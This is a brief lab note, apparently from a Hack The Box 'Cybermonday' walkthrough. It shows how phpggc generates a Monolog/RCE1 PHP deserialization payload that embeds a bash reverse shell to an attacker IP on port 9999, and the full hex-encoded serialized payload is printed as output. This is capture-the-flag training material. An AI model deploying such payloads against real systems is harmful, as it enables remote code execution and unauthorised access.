InfoSec LAB

Cybermonday_Payload

Created: 1 min read

phpggc

┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ git clone https://github.com/ambionics/phpggc.git ;  
Cloning into 'phpggc'...
remote: Enumerating objects: 3827, done.
remote: Counting objects: 100% (679/679), done.
remote: Compressing objects: 100% (232/232), done.
remote: Total 3827 (delta 506), reused 469 (delta 440), pack-reused 3148
receiving objects: 100% (3827/3827), 542.67 KiB | 3.10 MiB/s, done.
resolving deltas: 100% (1663/1663), done.

downloading phpggc to Kali

┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ ./phpggc/phpggc Monolog/RCE1 system "bash -c 'bash -i >& /dev/tcp/10.10.14.12/9999 0>&1'" -A
php deprecated:  Creation of dynamic property PHPGGC\Enhancement\ASCIIStrings::$full is deprecated in /home/kali/archive/htb/labs/cybermonday/phpggc/lib/PHPGGC/Enhancement/ASCIIStrings.php on line 16
o:32:"Monolog\Handler\SyslogUdpHandler":1:{S:9:"\00\2a\00\73\6f\63\6b\65\74";O:29:"Monolog\Handler\BufferHandler":7:{S:10:"\00\2a\00\68\61\6e\64\6c\65\72";r:2;S:13:"\00\2a\00\62\75\66\66\65\72\53\69\7a\65";i:-1;S:9:"\00\2a\00\62\75\66\66\65\72";a:1:{i:0;a:2:{i:0;S:51:"\62\61\73\68\20\2d\63\20\27\62\61\73\68\20\2d\69\20\3e\26\20\2f\64\65\76\2f\74\63\70\2f\31\30\2e\31\30\2e\31\34\2e\31\32\2f\39\39\39\39\20\30\3e\26\31\27";S:5:"\6c\65\76\65\6c";N;}}S:8:"\00\2a\00\6c\65\76\65\6c";N;S:14:"\00\2a\00\69\6e\69\74\69\61\6c\69\7a\65\64";b:1;S:14:"\00\2a\00\62\75\66\66\65\72\4c\69\6d\69\74";i:-1;S:13:"\00\2a\00\70\72\6f\63\65\73\73\6f\72\73";a:2:{i:0;S:7:"\63\75\72\72\65\6e\74";i:1;S:6:"\73\79\73\74\65\6d";}}}

Generating a deserialization payload for a Bash reverse shell with the -A flag for armored payload for maximum compatibility

Interactive Graph View

Backlinks